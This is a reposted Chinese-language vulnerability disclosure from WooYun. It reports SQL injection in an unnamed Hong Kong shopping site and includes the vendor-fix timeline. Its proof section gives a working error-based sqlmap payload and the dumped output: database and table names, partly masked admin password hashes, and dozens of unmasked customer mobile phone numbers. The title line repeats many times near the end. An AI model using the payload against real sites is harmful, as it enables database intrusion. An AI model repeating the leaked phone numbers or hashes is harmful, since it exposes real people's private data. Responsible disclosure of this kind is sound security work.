神刀安全网

漏洞标题: 香港某生活购物网站存在SQL注射(香港地區)

漏洞详情

披露状态:

2016-04-17: 细节已通知厂商并且等待厂商处理中
2016-04-20: 厂商已经确认,细节仅向厂商公开
2016-04-29: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

某生活购物网站存在SQL注射,可泄漏管理帐号密码,4571名会员姓名,电话,密码,邮箱,地址等11库信息。

详细说明:

某生活购物网站存在SQL注射,可泄漏管理帐号密码,4571名会员姓名,电话,密码,邮箱,地址等11库信息。 只提供了部分数据供核实,没全部当下来。点到为止,请尽快修复。

漏洞证明:

注入点:http://**.**.**.**/eshop/index.php?cate=5&ltye=2

–random-agent –level=5 –threads=10 –dbs

Parameter: cate (GET)

Type: error-based

Title: MySQL >= 5.0 AND error-based – WHERE, HAVING, ORDER BY or GROUP BY cl

ause

Payload: cate=5' AND (SELECT 4671 FROM(SELECT COUNT(*),CONCAT(0x7178627671,(

SELECT (ELT(4671=4671,1))),0x7162627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHE

MA.CHARACTER_SETS GROUP BY x)a) AND 'EfaS'='EfaS&ltye=2

[22:25:39] [INFO] the back-end DBMS is MySQL

web application technology: Nginx, PHP 5.5.0

back-end DBMS: MySQL 5.0

available databases [11]:

mask 区域
*****bk201*****
*****lyho*****
*****HOO_T*****
*****O_TEST*****
*****o_www2*****
*****tion_s*****
*****lser*****
*****ysq*****
*****ance_s*****
*****myad*****
*****osl*****

Database: BALLYHOO_TEST

[119 tables]

+———————————–+

mask 区域
*****         *****
*****916 *****
***** *****
***** *****
*****1 *****
***** *****
*****0921 *****
***** *****
***** *****
***** *****
***** *****
*****0921 *****
***** *****
*****_MAIL *****
*****ION *****
***** *****
***** *****
*****50826 *****
*****LOG *****
*****16 *****
*****25_1 *****
*****02 *****
*****21 *****
***** *****
***** *****
***** *****
***** *****
*****Y *****
***** *****
***** *****
*****E *****
***** *****
*****k20150826*****
***** *****
*****W *****
***** *****
*****_BAK *****
*****ete *****
***** *****
*****6 *****
***** *****
***** *****
*****NT *****
*****ER *****
*****ER_ADDRES*****
*****ER_PRODUC*****
*****CK *****
***** *****
*****0160111 *****
*****ADDRESS *****
*****ADDRESS_b*****
*****PRODUCT *****
*****PRODUCT_b*****
*****PRODUCT_b*****
*****PRODUCT_b*****
*****bk2015060*****
***** *****
*****bk2015060*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****5 *****
***** *****
***** *****
*****0820 *****
***** *****
***** *****
*****_member *****
*****_member_b*****
*****re_addres*****
*****re_member*****
***** *****
*****ddress *****
*****ember *****
***** *****
*****30 *****
*****25 *****
***** *****
*****t *****
***** *****
*****bk *****
***** *****
***** *****
***** *****
***** *****
*****group *****
***** *****
***** *****
*****e *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ly *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****ok *****
***** *****
***** *****
***** *****
*****21 *****
*****29 *****
*****28 *****
***** *****
***** *****
***** *****
*****---------*****
*****ALLYHO*****
*****: a*****
*****lum*****
*****---------*****
***** *****
*****---------*****
*****int(1) un*****
*****int(1) un*****
*****har(255) *****
*****lint(4) u*****
*****har(16) *****
*****har(60) *****
*****(32) *****
*****int(1) un*****

+———-+———————-+

Database: BALLYHOO_TEST

Table: admin

[6 entries]

mask 区域
*****----------------*****
*****rd *****
*****-----------------*****
*****5c01676481b07baea*****
*****0d3be52436691cb2f*****
*****b3bbbc0a472166030*****
*****77f244def8a70e5ea*****
*****26b0187742b4c8512*****
*****efedfe0345641287*****
*****----------------*****
**********
*****询结*****
*****all*****
*****ALLYHO*****
*****MEMB*****
*****olu*****
*****-+---------*****
***** | Type *****
*****-+---------*****
***** | varchar(*****
***** | varchar(*****
***** | varchar(*****
***** | bigint(2*****
***** | varchar(*****
***** | date *****
***** | decimal(*****
***** | datetime*****
***** | datetime*****
***** | date *****
***** | datetime*****
***** | datetime*****
***** | datetime*****
***** | char(1) *****
***** | bigint(2*****
***** | varchar(*****
***** | varchar(*****
***** | varchar(*****
***** | varchar(*****
***** | varchar(*****
***** | varchar(*****
***** | bigint(2*****
***** | varchar(*****
***** | varchar(*****
***** | varchar(*****
***** | char(1) *****
***** | char(1) *****
***** | char(1) *****
***** | varchar(*****
***** | char(1) *****
***** | int(20) *****
***** | bigint(2*****
***** | varchar(*****
***** | varchar(*****
***** | bigint(2*****
***** | varchar(*****
***** | char(1) *****
***** | varchar(*****
***** | varchar(*****
*****-+---------*****
*****ALLYHO*****
*****+----*****
*****| Ent*****
*****+----*****
*****| 457*****
*****+----*****

Database: BALLYHOO_TEST

Table: MEMBER

[76 entries]

mask 区域
*****-------------------*****
*****---*****
***** | MOBILE_NO*****
***** *****
*****-------------------*****
*****---*****
***** | 98873902 *****
***** *****
***** | 904669*****
***** *****
***** 13798722828 *****
***** *****
***** 13435729011 *****
***** *****
***** | 63051551 *****
***** *****
*****3235705 *****
***** *****
***** | 15088286978 *****
***** *****
*****3424771399 *****
***** *****
***** | 15245674567 *****
***** *****
***** | 130-166-22218 *****
******* *****
***** | 8613316223012 *****
***** *****
***** | 8620--13808810344*****
***** *****
***** | 13810856646 *****
***** *****
***** | 13926039072 *****
***** *****
*****;blank> *****
*******.******
***** | 0989-468-893 *****
******* *****
*****3637917417 *****
***** *****
*****0999763 *****
***** *****
*****3631791053 *****
***** *****
***** 13897961668 *****
***** *****
***** 0086-020-13826434071*****
***** *****
***** 15268610100 *****
***** *****
***** 18688110442 *****
***** *****
*****2888179 *****
***** *****
*****8675525989488 *****
***** *****
*****3761142808 *****
***** *****
***** 18697974401 *****
***** *****
***** 15196695247 *****
***** *****
***** 13430249444 *****
***** *****
***** 13588262731 *****
***** *****
***** 86-020-13560154821 *****
***** *****
***** 13592750903 *****
***** *****
***** 63382322 *****
***** *****
*****789530119 *****
***** *****
*****3427515653 *****
***** *****
***** 13751117123 *****
***** *****
*****| bG92ZWN*****

mask 区域
*****@**.*******
***** *****
***** 13703037910 *****
***** *****
***** 68596216 *****
***** *****
***** 13411203745 *****
***** *****
***** 13542290327 *****
***** *****
***** 0-0769-13825730333 *****
***** *****
***** +8618666089484 *****
***** *****
*****5933095 *****
***** *****
***** 15015774229 *****
***** *****
***** 36932061 *****
***** *****
***** 0091-8826718678 *****
***** *****
*****8825171114 *****
***** *****
*****3829139901 *****
***** *****
***** 13712261147 *****
***** *****
***** 0086-0755-1375142575*****
***** *****
***** 15800937288 *****
***** *****
***** 13928289482 *****
***** *****
***** 13662379211 *****
***** *****
***** 13723456038 *****
***** *****
***** 13768441101 *****
***** *****
***** 13790017904 *****
***** *****
***** 15975023403 *****
***** *****
***** 13923436530 *****
***** *****
***** 15359357028 *****
***** *****
***** 13543481528 *****
***** *****
*****7765869 *****
***** *****
***** 62422657 *****
***** *****
***** 56222451 *****
***** *****
***** 13925444246 *****
***** *****
***** 13017738883 *****
***** *****
***** 001186-18668334252 *****
***** *****
***** 59337166 *****
***** *****
***** 13760787090 *****
***** *****
***** 17405167218 *****
***** *****
***** 18305991801 *****
***** *****
***** 13790237267 *****
***** *****
***** --13917315303 *****
***** *****
***** 13542512178 *****
***** *****
***** 0061425628333 *****
***** *****
***** | 13929973874 *****

+————+———————-+———————–+——————-

——–+

漏洞标题:  香港某生活购物网站存在SQL注射(香港地區)

漏洞标题:  香港某生活购物网站存在SQL注射(香港地區)

漏洞标题:  香港某生活购物网站存在SQL注射(香港地區)

漏洞标题:  香港某生活购物网站存在SQL注射(香港地區)

漏洞标题:  香港某生活购物网站存在SQL注射(香港地區)

漏洞标题:  香港某生活购物网站存在SQL注射(香港地區)

漏洞标题:  香港某生活购物网站存在SQL注射(香港地區)

漏洞标题:  香港某生活购物网站存在SQL注射(香港地區)

漏洞标题:  香港某生活购物网站存在SQL注射(香港地區)

漏洞标题:  香港某生活购物网站存在SQL注射(香港地區)

漏洞标题:  香港某生活购物网站存在SQL注射(香港地區)

漏洞标题:  香港某生活购物网站存在SQL注射(香港地區)

漏洞标题:  香港某生活购物网站存在SQL注射(香港地區)

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 香港某生活购物网站存在SQL注射(香港地區)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址